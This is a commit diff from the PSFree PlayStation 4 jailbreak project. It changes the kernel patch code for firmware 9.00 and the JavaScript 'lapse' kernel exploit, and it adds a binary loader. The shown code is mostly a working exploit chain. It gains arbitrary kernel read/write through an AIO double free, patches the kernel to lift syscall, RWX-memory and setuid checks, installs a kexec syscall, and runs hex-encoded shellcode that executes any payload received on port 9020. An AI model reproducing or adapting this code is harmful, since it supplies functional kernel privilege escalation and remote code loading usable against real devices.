Seth/PSFree
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #39 from Nazky/main

Browse Source 
Revert kpatch + adding binloader
This commit is contained in:
Kameleon
2025-05-29 14:24:10 -06:00
committed by GitHub
parent 6a5203eba4 f07c1eab59
commit 38687a4370
5 changed files with 162 additions and 157 deletions
Download Patch File Download Diff File Expand all files Collapse all files
kpatch/900.c
+43 -116
View File
@@ -16,7 +16,6 @@ You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>. */
#include <stddef.h>
#include <string.h>
#include "types.h"
#include "utils.h"
@@ -58,123 +57,51 @@ void do_patch(void) {
void * const kbase = (void *)rdmsr(0xC0000082) - off_fast_syscall;
disable_cr0_wp();
// patch amd64_syscall() to allow calling syscalls everywhere
// struct syscall_args sa; // initialized already
// u64 code = get_u64_at_user_address(td->tf_frame-tf_rip);
// int is_invalid_syscall = 0
//
// // check the calling code if it looks like one of the syscall stubs at a
// // libkernel library and check if the syscall number correponds to the
// // proper stub
// if ((code & 0xff0000000000ffff) != 0x890000000000c0c7
// || sa.code != (u32)(code >> 0x10)
// ) {
// // patch this to " = 0" instead
// is_invalid_syscall = -1;
// }
write32(kbase, 0x490, 0);
// these code corresponds to the check that ensures that the caller's
// instruction pointer is inside the libkernel library's memory range
//
// // patch the check to always go to the "goto do_syscall;" line
// void *code = td->td_frame->tf_rip;
// if (libkernel->start <= code && code < libkernel->end
// && is_invalid_syscall == 0
// ) {
// goto do_syscall;
// }
//
// do_syscall:
// ...
// lea rsi, [rbp - 0x78]
// mov rdi, rbx
// mov rax, qword [rbp - 0x80]
// call qword [rax + 8] ; error = (sa->callp->sy_call)(td, sa->args)
//
// sy_call() is the function that will execute the requested syscall.
write16(kbase, 0x4b5, 0x9090);
write16(kbase, 0x4b9, 0x9090);
write8(kbase, 0x4c2, 0xeb);
// patch sys_mmap() to allow rwx mappings
// patch maximum cpu mem protection: 0x33 -> 0x37
// the ps4 added custom protections for their gpu memory accesses
// GPU X: 0x8 R: 0x10 W: 0x20
// that's why you see other bits set
// ref: https://cturt.github.io/ps4-2.html
write8(kbase, 0x16632a, 0x37);
write8(kbase, 0x16632d, 0x37);
// patch vm_map_protect() (called by sys_mprotect()) to allow rwx mappings
//
// this check is skipped after the patch
//
// if ((new_prot & current->max_protection) != new_prot) {
// vm_map_unlock(map);
// return (KERN_PROTECTION_FAILURE);
// }
write32(kbase, 0x80b8d, 0);
// patch sys_dynlib_dlsym() to allow dynamic symbol resolution everywhere
// call ...
// mov r14, qword [rbp - 0xad0]
// cmp eax, 0x4000000
// jb ... ; patch jb to jmp
write8(kbase, 0x23B67F, 0xeb);
// patch called function to always return 0
//
// sys_dynlib_dlsym:
// ...
// mov edi, 0x10 ; 16
// call patched_function ; kernel_base + 0x951c0
// test eax, eax
// je ...
// mov rax, qword [rbp - 0xad8]
// ...
// patched_function: ; patch to "xor eax, eax; ret"
// push rbp
// mov rbp, rsp
// ...
write32(kbase, 0x221B40, 0xC3C03148);
// patch sys_setuid() to allow freely changing the effective user ID
// ; PRIV_CRED_SETUID = 50
// call priv_check_cred(oldcred, PRIV_CRED_SETUID, 0)
// test eax, eax
// je ... ; patch je to jmp
write8(kbase, 0x1A06, 0xeb);
// patch sysveri to prevent delayed panics
write16(kbase, 0x626874, 0x9090);
// overwrite the entry of syscall 11 (unimplemented) in sysent
//
// struct args {
// u64 rdi;
// u64 rsi;
// u64 rdx;
// u64 rcx;
// u64 r8;
// u64 r9;
// };
//
// int sys_kexec(struct thread td, struct args *uap) {
// asm("jmp qword ptr [rsi]");
// }
// sysent[11]
//ChendoChap Patches For 900
const size_t KERNEL_enable_syscalls_1 = 0x490;
const size_t KERNEL_enable_syscalls_2 = 0x4B5;
const size_t KERNEL_enable_syscalls_3 = 0x4B9;
const size_t KERNEL_enable_syscalls_4 = 0x4C2;
const size_t KERNEL_mprotect = 0x80B8D;
const size_t KERNEL_prx = 0x23AEC4;
const size_t KERNEL_mmap_1 = 0x16632A;
const size_t KERNEL_mmap_2 = 0x16632D;
const size_t KERNEL_dlsym_1 = 0x23B67F;
const size_t KERNEL_dlsym_2 = 0x221b40;
const size_t KERNEL_setuid = 0x1A06;
const size_t KERNEL_bzero = 0x2713FD;
const size_t KERNEL_pagezero = 0x271441;
const size_t KERNEL_memcpy = 0x2714BD;
const size_t KERNEL_pagecopy = 0x271501;
const size_t KERNEL_copyin = 0x2716AD;
const size_t KERNEL_copyinstr = 0x271B5D;
const size_t KERNEL_copystr = 0x271C2D;
const size_t KERNEL_veriPatch = 0x626874;
const size_t KERNEL_setcr0_patch = 0x3ade3B;
write32(kbase, KERNEL_enable_syscalls_1, 0);
write16(kbase, KERNEL_enable_syscalls_2, 0x9090);
write16(kbase, KERNEL_enable_syscalls_3, 0x9090);
write8(kbase, KERNEL_enable_syscalls_4, 0xEB);
write8(kbase, KERNEL_mmap_1, 0x37);
write8(kbase, KERNEL_mmap_2, 0x37);
write32(kbase, KERNEL_mprotect, 0);
write8(kbase, KERNEL_dlsym_1, 0xEB);
write32(kbase, KERNEL_dlsym_2, 0xC3C03148);
write8(kbase, KERNEL_setuid, 0xEB);
write16(kbase, KERNEL_prx, 0xE990);
write8(kbase, KERNEL_bzero, 0xEB);
write8(kbase, KERNEL_pagezero, 0xEB);
write8(kbase, KERNEL_memcpy, 0xEB);
write8(kbase, KERNEL_pagecopy, 0xEB);
write8(kbase, KERNEL_copyin, 0xEB);
write8(kbase, KERNEL_copyinstr, 0xEB);
write8(kbase, KERNEL_copystr, 0xEB);
write16(kbase, KERNEL_veriPatch, 0x9090);
write32(kbase, KERNEL_setcr0_patch, 0xC3C7220F);
const size_t offset_sysent_11 = 0x1100520;
// .sy_narg = 6
write32(kbase, offset_sysent_11, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
write32(kbase, offset_sysent_11, 2);
write64(kbase, offset_sysent_11 + 8, kbase + 0x4c7ad);
// .sy_thrcnt = SY_THR_STATIC
write32(kbase, offset_sysent_11 + 0x2c, 1);
write32(kbase, offset_sysent_11 + 0x2c, 1);
enable_cr0_wp();
}
kpatch/900.elf
BIN
View File
Binary file not shown.
kpatch/900.o
BIN
View File
Binary file not shown.
lapse.mjs
+110 -36
View File
@@ -96,9 +96,6 @@ const CPU_LEVEL_WHICH = 3;
const CPU_WHICH_TID = 1;
// sys/mman.h
const PROT_READ = 1;
const PROT_WRITE = 2;
const PROT_EXEC = 4;
const MAP_SHARED = 1;
const MAP_FIXED = 0x10;
@@ -136,13 +133,15 @@ const main_core = 7;
const num_grooms = 0x200;
const num_handles = 0x100;
const num_sds = 0x100; // max is 0x100 due to max IPV6_TCLASS
const num_alias = 50; //TODO: check best value here for 9.xx
const num_alias = 10;
const num_races = 100;
const leak_len = 16;
const num_leaks = 5;
const num_clobbers = 8;
let chain = null;
var nogc = [];
async function init() {
await rop.init();
chain = new Chain();
@@ -1459,15 +1458,16 @@ function make_kernel_arw(pktopts_sds, dirty_sd, k100_addr, kernel_addr, sds) {
die('pipe read failed');
}
log('achieved arbitrary kernel read/write');
// RESTORE: clean corrupt pointers
// pktopts.ip6po_rthdr = NULL
const off_ip6po_rthdr = is_ps4 ? 0x68 : 0x70;
const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
kmem.write64(r_rthdr_p, 0);
kmem.write64(w_rthdr_p, 0);
log('corrupt pointers cleaned');
// RESTORE: clean corrupt pointer
// pktopts.ip6po_rthdr = NULL
//ABC Patch
const off_ip6po_rthdr = 0x68;
const r_rthdr_p = r_pktopts.add(off_ip6po_rthdr);
const w_rthdr_p = w_pktopts.add(off_ip6po_rthdr);
kmem.write64(r_rthdr_p, 0);
kmem.write64(w_rthdr_p, 0);
log('corrupt pointers cleaned');
/*
// REMOVE once restore kernel is ready for production
@@ -1508,7 +1508,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
const sy_narg = kmem.read32(sysent_661);
const sy_call = kmem.read64(sysent_661.add(8));
const sy_thrcnt = kmem.read32(sysent_661.add(0x2c));
// .sy_narg = 6
kmem.write32(sysent_661, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1516,18 +1515,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
// .sy_thrcnt = SY_THR_STATIC
kmem.write32(sysent_661.add(0x2c), 1);
log('change sys_execv() to sys_kexec()');
const offset_sysent_11 = 0x1100520;
const sysent_11 = kbase.add(offset_sysent_11);
// .sy_narg = 2
kmem.write32(sysent_11, 6);
// .sy_call = gadgets['jmp qword ptr [rsi]']
kmem.write64(sysent_11.add(8), kbase.add(0x4c7ad));
// .sy_thrcnt = SY_THR_STATIC
kmem.write32(sysent_11.add(0x2c), 1);
log('add JIT capabilities');
// TODO just set the bits for JIT privs
// cr_sceCaps[0]
@@ -1610,7 +1597,6 @@ async function patch_kernel(kbase, kmem, p_ucred, restore_info) {
log('setuid(0)');
sysi('setuid', 0);
log('kernel exploit succeeded!');
log('restore sys_aio_submit()');
kmem.write32(sysent_661, sy_narg);
// .sy_call = gadgets['jmp qword ptr [rsi]']
@@ -1639,6 +1625,20 @@ function setup(block_fd) {
}
aio_submit_cmd(AIO_CMD_READ, reqs1.addr, num_workers, block_id.addr);
{
const reqs1 = make_reqs1(1);
const timo = new Word(1);
const id = new Word();
aio_submit_cmd(AIO_CMD_READ, reqs1.addr, 1, id.addr);
chain.do_syscall_clear_errno(
'aio_multi_wait', id.addr, 1, _aio_errors_p, 1, timo.addr);
const err = chain.errno;
if (err !== 60) { // ETIMEDOUT
die(`SceAIO system not blocked. errno: ${err}`);
}
free_aios(id.addr, 1);
}
log('heap grooming');
// chosen to maximize the number of 0x80 malloc allocs per submission
const num_reqs = 3;
@@ -1651,6 +1651,48 @@ function setup(block_fd) {
return [block_id, groom_ids];
}
function runBinLoader() {
var payload_buffer = chain.sysp('mmap', 0x0, 0x300000, 0x7, 0x1000, 0xFFFFFFFF, 0);
var payload_loader = malloc32(0x1000);
var BLDR = payload_loader.backing;
BLDR[0] = 0x56415741; BLDR[1] = 0x83485541; BLDR[2] = 0x894818EC;
BLDR[3] = 0xC748243C; BLDR[4] = 0x10082444; BLDR[5] = 0x483C2302;
BLDR[6] = 0x102444C7; BLDR[7] = 0x00000000; BLDR[8] = 0x000002BF;
BLDR[9] = 0x0001BE00; BLDR[10] = 0xD2310000; BLDR[11] = 0x00009CE8;
BLDR[12] = 0xC7894100; BLDR[13] = 0x8D48C789; BLDR[14] = 0xBA082474;
BLDR[15] = 0x00000010; BLDR[16] = 0x000095E8; BLDR[17] = 0xFF894400;
BLDR[18] = 0x000001BE; BLDR[19] = 0x0095E800; BLDR[20] = 0x89440000;
BLDR[21] = 0x31F631FF; BLDR[22] = 0x0062E8D2; BLDR[23] = 0x89410000;
BLDR[24] = 0x2C8B4CC6; BLDR[25] = 0x45C64124; BLDR[26] = 0x05EBC300;
BLDR[27] = 0x01499848; BLDR[28] = 0xF78944C5; BLDR[29] = 0xBAEE894C;
BLDR[30] = 0x00001000; BLDR[31] = 0x000025E8; BLDR[32] = 0x7FC08500;
BLDR[33] = 0xFF8944E7; BLDR[34] = 0x000026E8; BLDR[35] = 0xF7894400;
BLDR[36] = 0x00001EE8; BLDR[37] = 0x2414FF00; BLDR[38] = 0x18C48348;
BLDR[39] = 0x5E415D41; BLDR[40] = 0x31485F41; BLDR[41] = 0xC748C3C0;
BLDR[42] = 0x000003C0; BLDR[43] = 0xCA894900; BLDR[44] = 0x48C3050F;
BLDR[45] = 0x0006C0C7; BLDR[46] = 0x89490000; BLDR[47] = 0xC3050FCA;
BLDR[48] = 0x1EC0C748; BLDR[49] = 0x49000000; BLDR[50] = 0x050FCA89;
BLDR[51] = 0xC0C748C3; BLDR[52] = 0x00000061; BLDR[53] = 0x0FCA8949;
BLDR[54] = 0xC748C305; BLDR[55] = 0x000068C0; BLDR[56] = 0xCA894900;
BLDR[57] = 0x48C3050F; BLDR[58] = 0x006AC0C7; BLDR[59] = 0x89490000;
BLDR[60] = 0xC3050FCA;
chain.sys('mprotect', payload_loader, 0x4000, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
sysi('mlock', payload_buffer, 0x300000);
call_nze(
'pthread_create',
pthread,
0,
payload_loader,
payload_buffer
);
log('BinLoader is ready. Send a payload to port 9020 now');
}
// overview:
// * double free a aio_entry (resides at a 0x80 malloc zone)
// * type confuse a evf and a ip6_rthdr
@@ -1667,10 +1709,16 @@ export async function kexploit() {
await init();
const _init_t2 = performance.now();
if(sessionStorage.getItem('binloader')){
runBinLoader();
return new Promise(() => {});
}
// If setuid is successful, we dont need to run the kexploit again
try {
if (sysi('setuid', 0) == 0) {
log("Not running kexploit again.")
log("Not running kexploit again.");
runBinLoader();
return;
}
}
@@ -1751,18 +1799,44 @@ export async function kexploit() {
}
}
function malloc(sz) {
var backing = new Uint8Array(0x10000 + sz);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz) {
var backing = new Uint8Array(0x10000 + sz * 4);
nogc.push(backing);
var ptr = mem.readp(mem.addrof(backing).add(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
kexploit().then(() => {
var payload_loader = new View4(window.pld);
chain.sys('mprotect', payload_loader.addr, payload_loader.size, PROT_READ | PROT_WRITE | PROT_EXEC);
const ctx = new Buffer(0x10);
const pthread = new Pointer();
pthread.ctx = ctx;
window.pld_size = new Int(0x26200000, 0x9);
var payload_buffer = chain.sysp('mmap', window.pld_size, 0x300000, 7, 0x41000, -1, 0);
var payload = window.pld;
var bufLen = payload.length * 4
var payload_loader = malloc32(bufLen);
var loader_writer = payload_loader.backing;
for (var i = 0; i < payload.length; i++) {
loader_writer[i] = payload[i];
}
chain.sys('mprotect', payload_loader, bufLen, (0x1 | 0x2 | 0x4));
var pthread = malloc(0x10);
call_nze(
'pthread_create',
pthread.addr,
0,
payload_loader.addr,
pthread,
0,
payload_loader,
payload_buffer,
);
})
payload.js
+9 -5
View File
@@ -1,6 +1,10 @@
fetch('./payload.bin').then(res => {
res.arrayBuffer().then(arr => {
window.pld = new Uint32Array(arr);
if (sessionStorage.getItem('jbsuccess')) {
sessionStorage.setItem('binloader', 1);
} else {
fetch('./payload.bin').then(res => {
res.arrayBuffer().then(arr => {
window.pld = new Uint32Array(arr);
sessionStorage.setItem('jbsuccess', 1);
})
})
})
}